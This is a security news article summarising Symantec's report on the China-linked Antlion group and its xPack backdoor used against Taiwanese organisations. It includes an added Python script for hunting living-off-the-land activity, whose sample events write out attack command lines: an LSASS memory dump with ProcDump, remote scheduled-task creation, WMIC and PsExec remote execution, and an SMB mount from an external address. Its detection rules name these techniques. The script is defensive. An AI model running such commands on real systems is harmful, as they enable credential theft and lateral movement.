Antlion APT group used a custom backdoor that allowed them to fly under the radar for months

Pierluigi Paganini February 03, 2022

A China-linked APT group tracked as Antlion used a custom backdoor called xPack that was undetected for months.

A China-linked APT group tracked as Antlion is using a custom backdoor called xPack in attacks aimed at financial organizations and manufacturing companies, Symantec researchers reported.

The backdoor was undetected for at least 18 months in a cyberespionage campaign against entities in Taiwan between 2020 and 2021.

“The attackers deployed a custom backdoor we have called xPack on compromised systems, which gave them extensive access to victim machines.” reads the analysis published by the Broadcom-owned company Symantec.

“The backdoor allowed the attackers to run WMI commands remotely, while there is also evidence that they leveraged EternalBlue exploits in the backdoor.”

xPack allowed the attackers to run WMI commands remotely and to mount shares over SMB in order to move data between the command-and-control (C2) servers and the victim network. The attackers also used the malware to browse the web, likely as a proxy to mask their real IP address.

Symantec researchers analyzed one of the attacks carried out by the APT group that remained in the compromised network of a manufacturing organization for 175 days.

In another attack against a financial organization, the APT group spent 250 days in the target’s network.

At this time the initial infection vector is not clear. The researchers speculate that the attackers exploited a web application or service, because in one attack they observed the threat actors using the MSSQL service to execute system commands.

The xPack backdoor is a .NET loader that fetches and executes AES-encrypted payloads, and it supports multiple commands. The decryption password is provided as a command-line argument (a Base64-encoded string), and the backdoor can run either as a standalone application or as a service (the xPackSvc variant).

“The xPack malware and its associated payload seems to be used for initial access; it appears that xPack was predominantly used to execute system commands, drop subsequent malware and tools, and stage data for exfiltration. The attackers also used a custom keylogger and three custom loaders.” continues Symantec.

Symantec researchers spotted the following custom tools used by Antlion in this campaign:

  • EHAGBPSL loader – custom loader written in C++ – loaded by JpgRun loader
  • JpgRun loader – custom loader written in C++ – similar to xPack, reads the decryption key and filename from the command line – decodes the file and executes it
  • CheckID – custom loader written in C++ – based on loader used by BlackHole RAT
  • NetSessionEnum – Custom SMB session enumeration tool
  • ENCODE MMC – Custom bind/reverse file transfer tool
  • Kerberos golden ticket tool based on the Mimikatz credentials stealer

The APT gang also used several off-the-shelf and living-off-the-land (LoL) tools, for example PowerShell, WMIC, PsExec, and ProcDump (the latter to dump the memory of the LSASS process for credential theft).

Experts also noticed that the attackers exploited CVE-2019-1458, a Win32k elevation-of-privilege flaw in Windows, to escalate privileges, and created remote scheduled tasks to execute their backdoor.
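The tradecraft described above (remote scheduled tasks, WMIC and PsExec remote execution, ProcDump against LSASS, and SMB shares mounted towards C2 infrastructure) leaves process command lines that a defender can hunt over. The following Python script is an added example written for this page, not code from Symantec or from the Antlion toolset: it runs a handful of command-line heuristics over constructed Sysmon-style process-creation records (the hostnames, IP addresses and commands are invented for illustration) and reports the matches. The list of internal address ranges is an assumption that a deployment would replace with its own.

```python
"""Hunt for living-off-the-land activity in process-creation command lines.

Added example for this article; the sample events below are constructed,
not real telemetry.
"""
import ipaddress
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    host: str
    cmdline: str


# Constructed sample records: (source host, process command line).
SAMPLE_EVENTS = [
    ("WS-0017", "schtasks.exe /create /s FILESRV01 /u CORP\\svc_backup /p ******** "
                "/tn \"Update\" /tr C:\\ProgramData\\x.exe /sc once /st 02:00"),
    ("WS-0017", "procdump.exe -accepteula -ma lsass.exe C:\\ProgramData\\l.dmp"),
    ("WS-0017", "wmic /node:FILESRV01 process call create \"cmd.exe /c whoami\""),
    ("WS-0017", "net use Z: \\\\203.0.113.10\\share /user:x ********"),
    ("WS-0017", "PsExec.exe \\\\FILESRV01 -s cmd.exe"),
    ("WS-0017", "schtasks.exe /query /tn Backup"),          # benign: local query
    ("WS-0017", "net use Z: \\\\fileserver.corp.local\\share"),  # benign: internal share
]

# Assumed internal ranges; a real deployment would substitute its own.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16",
)]

# Matches a UNC path whose host part is an IPv4 literal, e.g. \\203.0.113.10\share
UNC_IPV4 = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\")


def is_external_ip(addr: str) -> bool:
    """True if addr parses as an IP outside the assumed internal ranges."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def classify(cmdline: str) -> list:
    """Return the names of every heuristic the command line trips."""
    c = cmdline.lower()
    hits = []
    # schtasks /create aimed at another machine via /s <host>
    if "schtasks" in c and "/create" in c and re.search(r"\s/s\s+\S+", c):
        hits.append("remote_scheduled_task")
    # ProcDump pointed at LSASS: memory dump used for credential theft
    if "procdump" in c and "lsass" in c:
        hits.append("lsass_dump")
    # WMIC remote process creation against /node:<host>
    if "wmic" in c and "/node:" in c and "process call create" in c:
        hits.append("wmic_remote_exec")
    # PsExec launched against a remote host (\\host), here as SYSTEM (-s)
    if "psexec" in c and "\\\\" in c:
        hits.append("psexec_remote")
    # SMB share mounted from an address outside the internal ranges
    m = UNC_IPV4.search(cmdline)
    if "net use" in c and m and is_external_ip(m.group(1)):
        hits.append("smb_mount_external_ip")
    return hits


def hunt(events) -> list:
    """Apply classify() to every (host, cmdline) record and collect findings."""
    return [Finding(rule, host, cmdline)
            for host, cmdline in events
            for rule in classify(cmdline)]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.host}: {f.cmdline}")
```

Each heuristic is deliberately narrow, so the two benign records (a local schtasks query and a mount of an internal share by name) produce no finding; in production the rules would be tuned against the environment's own baseline of administrative activity.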

The attackers also used legitimate versions of WinRAR to archive data for exfiltration, and batch scripts to automate the data collection process. In some cases the threat actors staged the stolen data for later exfiltration.

The threat actors were returning periodically in the compromised network to launch xPack again and steal account credentials from the compromised organizations.

Symantec believes Antlion has been active since at least 2011, and its TTPs overlap with those associated with China-linked nation-state actors.

“The length of time that Antlion was able to spend on victim networks is notable, with the group able to spend several months on victim networks, affording plenty of time to seek out and exfiltrate potentially sensitive information from infected organizations.” concludes the report, which includes IoCs and Yara rules. “The targeting of Taiwan is perhaps unsurprising given we know Chinese state-backed groups tend to be interested in organizations in that region.”
